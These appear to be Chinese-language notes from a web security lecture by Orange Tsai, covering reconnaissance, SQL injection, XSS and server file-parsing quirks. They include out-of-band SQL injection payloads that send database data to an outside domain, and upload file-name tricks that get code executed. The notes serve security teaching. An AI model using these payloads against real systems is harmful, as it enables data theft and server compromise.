今天的課程請到 Orange Tsai 大大,講題為 Web Security。

  • 三大面向(交集:思路)
    • 技術
    • 經驗
    • 技巧

SQL Injection 練習網站

Injection Flaw

  • SQL injection
  • cross site script
  • code injection
  • LDAP injection
  • XPATH injection
  • command injection

資訊搜集

  • Web Fingerprints
    • wappalyzer, whatweb, recon-ng
  • 經驗
    • Header
    • Python 遇到錯的編碼容易掛掉
    • 錯誤頁面
    • Google
      • “site:www.nctu.edu.tw ext:php”
    • Strust2
      • ?actionError=1
    • RESTful
      • http://xxxx/show/id/1
      • http://xxxx/show.php?id=1
  • Dictionary Attack
    • 路徑
    • /admin
    • /phpmyadmin
    • /sourcecode.zip

SQL Injection

  • Union based
  • Error based
  • Blind based
  • Time based
  • Out of band(讓 database 把東西丟出來)
    • Oracle
      • request.utl_http(‘http://orange.tw/’   (select user from dual))
    • MySQL (along with Windows)
      • UNC path (\127.0.0.1\c$)
      • load_file(concat(‘\\‘,version(),’.orange.tw\cxx’))
        • 5.1.3.orange.tw
      • dnslogger -> skullsecurity nbtools

Cross Site Scripting (XSS)

  • http://pwn.orange.tw
  • svg onload
  • Tweetdeck XSS Emoji

PHP 語言鬆散特性

  • Wordpress 漏洞
  • 2014 台大學生會長選舉網站 preg_match() === 0
  • Apache feature
    • “hacker.php.xxx” works
  • Nginx + PHP (舊版)
    • 又稱 Nginx 文件解析漏洞(但其實不是 Nginx 的漏洞)
      • 圖檔嵌入 PHP code
      • big.jpg/.php
      • http://pastebin.com/robots.txt
        • Content-Type = text/plain
      • http://pastebin.com/robots.txt/a.php
        • Content-Type = text/html
  • IIS + ASP (IIS 6 以下)
    • 分號 parsing 錯誤
      • “xxx.asp;a.jpg”
    • 名稱為 “.asp” 結尾的 directory 其下的檔案都會被當成 ASP 來執行
      • /a.asp/avatar.jpg 當成 asp 執行
  • Java
    • sessioin fixation
    • “1.jsp” 不可執行但 “1.jsp;” 可以

Tools

  • Firefox (OSWASP mantra)
    • Cookie Manageer
    • FoxyProxy
    • HackBar
    • Modify Headers
      • Include shellshock testing each HTTP request
    • Tamper Data
    • Wappalyzer
    • X-Forwarded-For
      • 127.0.0.1’
  • Burp Suite